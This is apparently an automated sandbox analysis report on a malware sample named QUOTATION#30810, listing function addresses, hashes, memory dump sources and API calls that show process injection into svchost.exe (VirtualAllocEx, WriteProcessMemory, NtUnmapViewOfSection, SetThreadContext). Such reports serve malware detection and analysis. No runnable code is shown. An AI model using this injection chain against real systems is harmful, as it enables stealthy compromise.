String ID: fish
API String ID: 0-1064584243
Opcode ID: 281601d0579cbe0109181cb753896aaeea32d7fb81f1b38c14ac401e92a702a6
Instruction ID: 220844831050f21c76631cf6cbea6a7753ad7c00dc7677b30d7fd2ec0c3b61c7
Opcode Fuzzy Hash: 281601d0579cbe0109181cb753896aaeea32d7fb81f1b38c14ac401e92a702a6
Instruction Fuzzy Hash: CDE15CB1A0DA8A0FE75DAE78D8A11B577F5EFA5311B1401FEE48AC31D7DD14AC068381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF98980 Relevance: .9, Instructions: 920COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7787e602e0213a4d9e860743d19bc1e2ff04febc17ea9195bda2156e28d2b392
Instruction ID: ecf82c8bb364d6e58a75b613af977474413ee1a75c8b2db4d13e2b412d5169b8
Opcode Fuzzy Hash: 7787e602e0213a4d9e860743d19bc1e2ff04febc17ea9195bda2156e28d2b392
Instruction Fuzzy Hash: 3B52A770A1CA098FDB68EF38D4A5A7977E9EF59341F2401BDE44EC72D2DE24AC428741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF90AA9 Relevance: .8, Instructions: 785COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d0ccf3d84741d2a66a09bf6252a78baeb202d4f9eb591f1efb85c693f405b10
Instruction ID: 3302edf15c9d31680de45352f9b7876ce0268e4f05ffb601c21deabdaa431a49
Opcode Fuzzy Hash: 2d0ccf3d84741d2a66a09bf6252a78baeb202d4f9eb591f1efb85c693f405b10
Instruction Fuzzy Hash: 4E3271A1B19A4A4FE784FE78C4A56B9B3E6FF98310F5441B9D80DC32D6DD38AC418741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AFA3B6D Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1d68242eabe19211679fa99e7f776e2520d0a0d48c05c0458864625b70fc048
Instruction ID: a5f029dc30bd5dd73aff6eb332985bc8b56ec39d43925a69007e6093979d9979
Opcode Fuzzy Hash: c1d68242eabe19211679fa99e7f776e2520d0a0d48c05c0458864625b70fc048
Instruction Fuzzy Hash: A2022DB591D94A4FE3A8EE3CD9575E4B7D5EF85320B2403F9D08DC72E2DA18AC064781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9BB00 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dca9c5c9212b2337343a4996547ed62ceef72cd28dfc5b6566d48573c8f4962
Instruction ID: e7d41e8f94b6473bdc5b7d952ae8a3c3c2328fe124a27b9b523810c7dde7d940
Opcode Fuzzy Hash: 0dca9c5c9212b2337343a4996547ed62ceef72cd28dfc5b6566d48573c8f4962
Instruction Fuzzy Hash: 2BB1557091CB864FE31DDF39C4A50B1B7E6EFD5311B2486BED4CAC72E5CA28A4468781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AFA4C3B Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37b6aa64d27fc03021a32c3f7fa1502fe25d6f4573eb0ff53dedaef048bf18c
Instruction ID: f4bd4984fc8e235badf11b96a264d6ebcaa91cb4a9734b815cbe66e2d0db5ff3
Opcode Fuzzy Hash: f37b6aa64d27fc03021a32c3f7fa1502fe25d6f4573eb0ff53dedaef048bf18c
Instruction Fuzzy Hash: 57415B7260D6890FD71E9E388C661B57BAAEB83220B1582BFD4C7C75D7DD24680783D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AFA4C94 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c2bcf57efa913914c612dd039fd992094fb7efd2ceea9f1165a4fce7497aab
Instruction ID: 50030adf639066769151649d631da884e34672a39d54b4dc50cc48cdfb863afe
Opcode Fuzzy Hash: 33c2bcf57efa913914c612dd039fd992094fb7efd2ceea9f1165a4fce7497aab
Instruction Fuzzy Hash: 6D414861A0D6891FD31E9E38C8611A17BAAEB87310B1582BFD4CBC71D7DD24A80783E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B07026B Relevance: 2.3, Strings: 1, Instructions: 1056
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 00007FFB4B070786

Memory Dump Source

Source File: 00000000.00000002.1601894330.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b070000_QUOTATION#30810.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: abb45a7af3b7917042521a261a589cb3386b9955d66942920249e589c82c266b
Instruction ID: a58bc454a201461592a488f214a622afd45d95b9a3b727948228cc1972b94fa2
Opcode Fuzzy Hash: abb45a7af3b7917042521a261a589cb3386b9955d66942920249e589c82c266b
Instruction Fuzzy Hash: BC6229B280D7864FE756EF78C8555A4BBE0FF55301F1886FED1C9CB2A2E9246806C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9303A Relevance: 1.6, APIs: 1, Instructions: 137
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFB4AF93111

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 87b274199a1505e3625440df3bc2f2615b9c4544feebbadbb6008a51c49715d9
Instruction ID: 75bae4b9eb70d1aad5838978d855e595edf3a26aa72ec7593b645d173f43d636
Opcode Fuzzy Hash: 87b274199a1505e3625440df3bc2f2615b9c4544feebbadbb6008a51c49715d9
Instruction Fuzzy Hash: C141243090CB888FDB19DFA898466E9BFF4EF56321F0402AFD049C31A3CB646856C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9090D Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00007FFB4AF9098F

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 9ccbb2fb87fddee9c6f85963ea1ccad969eecf2e7e3fccde954eb6d7046e213e
Instruction ID: 12b2c9df1aa45bb61b6b858e17861fb2409515955619ec32d88671fa67b1cb0f
Opcode Fuzzy Hash: 9ccbb2fb87fddee9c6f85963ea1ccad969eecf2e7e3fccde954eb6d7046e213e
Instruction Fuzzy Hash: D0219F7190CB4C8FEB68DF58D88AAEABBF0EB59310F00416ED049C3252DB71A805CB51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFB4AF94390 Relevance: .9, Instructions: 917COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1601507997.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af90000_QUOTATION#30810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f16f74de385adccb91a220499abc07f9288f1901a35ba9ea593a32c73a2564
Instruction ID: 5ef5729d2675d9092f923774e56a0c64ae9a1ac835b47dd8e277d89d63356938
Opcode Fuzzy Hash: d9f16f74de385adccb91a220499abc07f9288f1901a35ba9ea593a32c73a2564
Instruction Fuzzy Hash: C96220B191CA468FE769AF24C5406F57BE1EF95310F2441FDD48ECB6D3EA28A846C780

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 5864, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	13.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	40%
Total number of Nodes:	50
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFB4AF9C9A8 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

}L_, xrefs: 00007FFB4AF9CA04

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd

Similarity

API ID:
String ID: }L_
API String ID: 0-2082537435
Opcode ID: 13d4df4d87aa4943fb8a662da18d5b949639600d8f0ab6c05008c4a8954302c8
Instruction ID: 602b712462ebe9c8b99caa560ee49c295c8b525a7c95e4c4096a0321dcb34b93
Opcode Fuzzy Hash: 13d4df4d87aa4943fb8a662da18d5b949639600d8f0ab6c05008c4a8954302c8
Instruction Fuzzy Hash: D1B137F290C6558FE715FF6CE8961F97BA8EF52321F1442BBD089C3193E924640787A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF8BEE1 Relevance: 2.6, Strings: 1, Instructions: 1366
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#uM, xrefs: 00007FFB4AF8C9D7

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd

Similarity

API ID:
String ID: #uM
API String ID: 0-1265715537
Opcode ID: b5eaa33cf475bfaaa110174b7673dd2c052dbb5b5035c5e5a6784abafbe2b96a
Instruction ID: 1af716a39e7c51c570fac12915691bd4663cc2fee6107b53d2fb273943f9908d
Opcode Fuzzy Hash: b5eaa33cf475bfaaa110174b7673dd2c052dbb5b5035c5e5a6784abafbe2b96a
Instruction Fuzzy Hash: DCA2247091CA4A8FEB59EF38C4944A5B7E1FF95301B2445FED08AC72D6EB38A846C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF8EE79 Relevance: 1.9, Strings: 1, Instructions: 668
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

OM_H, xrefs: 00007FFB4AF8EE8E

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd

Similarity

API ID:
String ID: OM_H
API String ID: 0-3746890205
Opcode ID: eef6e481cc811a2d84f73c5701e9a7cc8d2e4df1ddb7edad907410e0d1fb661e
Instruction ID: 7f620826043277ac82ab0d91098249632109fa75dfc57634f2b0f083108dae81
Opcode Fuzzy Hash: eef6e481cc811a2d84f73c5701e9a7cc8d2e4df1ddb7edad907410e0d1fb661e
Instruction Fuzzy Hash: 0D220270A1CB864FD759DF38C4814A5B7E2FF95301B2486BEE486C72D6EA34E846C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9CA47 Relevance: 1.7, APIs: 1, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFB4AF9E47B

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 4be203bdffea4006b42d359cdae0e5d407d741db30ecacd110ba4784b025fb69
Instruction ID: 00bd2e39e454cb971e1a754d7c111ed43283a06f1da5567b4cabb31f5f361ed3
Opcode Fuzzy Hash: 4be203bdffea4006b42d359cdae0e5d407d741db30ecacd110ba4784b025fb69
Instruction Fuzzy Hash: 93414BF2A0C2598FDB15EF6CE8A62EA7BE8EF41320F1441BBD049C7143E93464478791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9CA83 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a097d03313c1e58650d962f844a8d1e3f555144b4f2718fdbab5d24f5257e89
Instruction ID: f77d9daee0da5db1d98cb154fc0e2994fdacb3e2996f08e7c92fced6f889b107
Opcode Fuzzy Hash: 6a097d03313c1e58650d962f844a8d1e3f555144b4f2718fdbab5d24f5257e89
Instruction Fuzzy Hash: AD4137B2A0C6498FEB54EF6CD8966E97BE4EF55320F0441BBD049C7143EA34A8078790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9E3DA Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFB4AF9E47B

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 3442b3c9ba4ea53efc9c9151f8c4f6b35ddce77916dbcf1a3bc008e33f69c54c
Instruction ID: 5a59ca5b8271820ac20edf2a957f606ed509bfd7bb92fb4b21dd923e904ba253
Opcode Fuzzy Hash: 3442b3c9ba4ea53efc9c9151f8c4f6b35ddce77916dbcf1a3bc008e33f69c54c
Instruction Fuzzy Hash: 0521D27190CA4C8FDB58DF6CD88A7E9BBF4EB56320F0441AFD049C3252CA70A456CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF8D2DA Relevance: .9, Instructions: 942COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df8a01356742ba348d5f0f2087ab8a7892976aadec1184fd36b6e438668b0bbe
Instruction ID: 88f9f693905f84984191e66d6f3ef6b6a4b1d1b4160cdb9e3bcd823af9ceb210
Opcode Fuzzy Hash: df8a01356742ba348d5f0f2087ab8a7892976aadec1184fd36b6e438668b0bbe
Instruction Fuzzy Hash: 8C52B370A1CA498FDF68EF28D455A79B7E5EF59340B2401BEE44EC72D2DF24AC428781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF8DD73 Relevance: .8, Instructions: 775COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04ff29a76e466b69f65291ebde5410bce160296e4596e70fafd07b344c46c15d
Instruction ID: 4540d8fc5305c9320c5c0f4903de25c28854a5e5d6b3281467c24c724c326496
Opcode Fuzzy Hash: 04ff29a76e466b69f65291ebde5410bce160296e4596e70fafd07b344c46c15d
Instruction Fuzzy Hash: B83249A2A1DA864FEB99EF38C856575BBD1EF55310B2801FED48DC71D3DE18E8068381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF8BB00 Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 325c7597736e6e255e626f3bc71008215c274340fbc00a5980004d21546e376d
Instruction ID: e5931046f4fe3fecf7598e238b34741a20b393f48d2e65696db6fb87465df97c
Opcode Fuzzy Hash: 325c7597736e6e255e626f3bc71008215c274340fbc00a5980004d21546e376d
Instruction Fuzzy Hash: B9B1757151CB864FE71DDF38C4950B5B7E2EFD2311B2486BED4CAC72E6CA28A4068781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9E5DD Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 271
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FFB4AF9E7D6

Strings

WL_H, xrefs: 00007FFB4AF9E68E

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd

Similarity

API ID: AllocVirtual
String ID: WL_H
API String ID: 4275171209-1262097562
Opcode ID: 077c2e3a96c1d36fe7a7e4a63c0ea3044021595054f03ebdcae5ad771701221f
Instruction ID: b2a5d38cbd5dba87d68bdeb0320d6e97154d54a645c90e55a2d778db8aaca94d
Opcode Fuzzy Hash: 077c2e3a96c1d36fe7a7e4a63c0ea3044021595054f03ebdcae5ad771701221f
Instruction Fuzzy Hash: 9571797190CB498FE719EF38D8965E5BBF4FF95310F1401BED08AC3292DA24A846C782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF8F8F0 Relevance: 1.9, Strings: 1, Instructions: 606
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

DM_H, xrefs: 00007FFB4AF8F98E

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd

Similarity

API ID:
String ID: DM_H
API String ID: 0-139757276
Opcode ID: 43627e5969858ae3eafdf641f6714e35769e83edfa0ba8a3c6c9b106d2677463
Instruction ID: 284aa774f9989cd4b84350e0e933615de04d3fa0acbc051d41f841c1ea528639
Opcode Fuzzy Hash: 43627e5969858ae3eafdf641f6714e35769e83edfa0ba8a3c6c9b106d2677463
Instruction Fuzzy Hash: CC02477160CA894FDB59EF38C4955B9BBE1EF95310B1401FEE48AC72D2DE34A846C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9E175 Relevance: 1.7, APIs: 1, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cadf5f9aba9fa8843c36af4e99af81bcfd4a5262ab8eb90d0cefa4b1e9f271d1
Instruction ID: 727fd5440a1cc09de4afc695c52ad36257004b56e8f108f6e816ec938051bd15
Opcode Fuzzy Hash: cadf5f9aba9fa8843c36af4e99af81bcfd4a5262ab8eb90d0cefa4b1e9f271d1
Instruction Fuzzy Hash: 3751E17180CB4C8FDB59DF6CD4546AABBF0EB99310F1442AFE489D3291DB34A8458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9E1B9 Relevance: 1.7, APIs: 1, Instructions: 172
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00007FFB4AF9E2E1

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 321686a49ced966072ed5e0515a30ecec25eb3855516b32dc54d2b477f7ff0a7
Instruction ID: f035a0fde19d374f5abcde7027f3b2bc464cdc62bfb769ec56460c15484efde6
Opcode Fuzzy Hash: 321686a49ced966072ed5e0515a30ecec25eb3855516b32dc54d2b477f7ff0a7
Instruction Fuzzy Hash: CB51AD7180CB5C8FDB59DF5CD8447A9BBF1EBA9321F0442AFE489D3291DB34A8458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF8303A Relevance: 1.6, APIs: 1, Instructions: 137
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFB4AF83111

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af80000_svchost.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9efb153da3038bd5ecfcf7a27e5445b55e4c771c07f929c22038b4295aada56c
Instruction ID: b5ab1516b6334f06b7d75eb7ff28f89514c7a8b25dbc5953ac57f277cc013e8c
Opcode Fuzzy Hash: 9efb153da3038bd5ecfcf7a27e5445b55e4c771c07f929c22038b4295aada56c
Instruction Fuzzy Hash: FE41F53090CB884FDB19DBA898466E9BFF1EF56321F0402AFD049C31A3CB646456C795

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9E92D Relevance: 1.6, APIs: 1, Instructions: 128
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00007FFB4AF9E9F0

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 973d59a901fec97c03e201ffc3ffc4a03d2d84ebd4223ab0b92c59af8a1ad3b6
Instruction ID: 343f6fec6c85f91aa988251858938a14c8fef08d76be4d1fc24477c43b1528c4
Opcode Fuzzy Hash: 973d59a901fec97c03e201ffc3ffc4a03d2d84ebd4223ab0b92c59af8a1ad3b6
Instruction Fuzzy Hash: B631187190CB888FDB19DF5CD8466F97BF5EB9A311F04426FE089C3292CA749846C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9EDF5 Relevance: 1.6, APIs: 1, Instructions: 102threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNELBASE ref: 00007FFB4AF9EE8B

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ec95a943122813c0993cbabbea59619b1853cc6675e4dac646baa44417dcc482
Instruction ID: f33047b69e5e25e1390e6e5df2e638fd9fbaf48e8bdd823d7385eb381a43ea8d
Opcode Fuzzy Hash: ec95a943122813c0993cbabbea59619b1853cc6675e4dac646baa44417dcc482
Instruction Fuzzy Hash: F831E27090C64C8FDB58EF6CD8856FABBE4EB65311F0441AFD049C3192DA70A855CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF8090D Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FreeConsole.KERNELBASE ref: 00007FFB4AF8098F

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af80000_svchost.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 40e352293348c549cb847f043ef37b1d8f8f8312766f3139040b9fd97dda10c9
Instruction ID: cb13308d89e1da299588b254200e6fbbe8b9e68f96c85f5212e186a6ccde6045
Opcode Fuzzy Hash: 40e352293348c549cb847f043ef37b1d8f8f8312766f3139040b9fd97dda10c9
Instruction Fuzzy Hash: CC21837190CB4C8FDB69DF58D84AAEABBF0EB55310F00416FD049C3652DB756809CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B0601C8 Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

A, xrefs: 00007FFB4B060236

Memory Dump Source

Source File: 00000009.00000002.1982421146.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4b060000_svchost.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: f3a4f133a01bdeb18714a1da85d06a218202ec4b1fe3b7fc50407f724d1b68bf
Instruction ID: 86984bb022bcebd2813e4ccceb5aa60987bec6226bd26d8ac551d63d6ac1555c
Opcode Fuzzy Hash: f3a4f133a01bdeb18714a1da85d06a218202ec4b1fe3b7fc50407f724d1b68bf
Instruction Fuzzy Hash: 1281187140CA8A8FDB56EF3CC8956E87BE0FF55305F5445FED149C72A2DA28A846C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF90D69 Relevance: .8, Instructions: 779COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa367dbb0ce3b67fc5623d13d6ff14d8f12e9124d022fa9e67b3b77f9a1d6da8
Instruction ID: 907a8025e86e8c55de98a832462f8f558cfa3b9573759436636934fe126ef434
Opcode Fuzzy Hash: aa367dbb0ce3b67fc5623d13d6ff14d8f12e9124d022fa9e67b3b77f9a1d6da8
Instruction Fuzzy Hash: 7532F6B060DA4A4FE799EF38D4A5A7977E9FF45300B1401FDE48AC76E2DE24AC428741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B060E71 Relevance: .8, Instructions: 752COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1982421146.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffb4b060000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a449de9c327d7d9d765dc95dfad77cae29a6ffc5d413ec5bb332c692c702ebd1
Instruction ID: 2d5481784bce96cc62b0c9ea999f2c5b388c9fb1335653a2f0a90661ab199a27
Opcode Fuzzy Hash: a449de9c327d7d9d765dc95dfad77cae29a6ffc5d413ec5bb332c692c702ebd1
Instruction Fuzzy Hash: 6732F6B280D6C64FE756EF38C8565A47FE0FF56301F0841FED589CB2A2D928A816C391

Uniqueness

Uniqueness Score: -1.00%

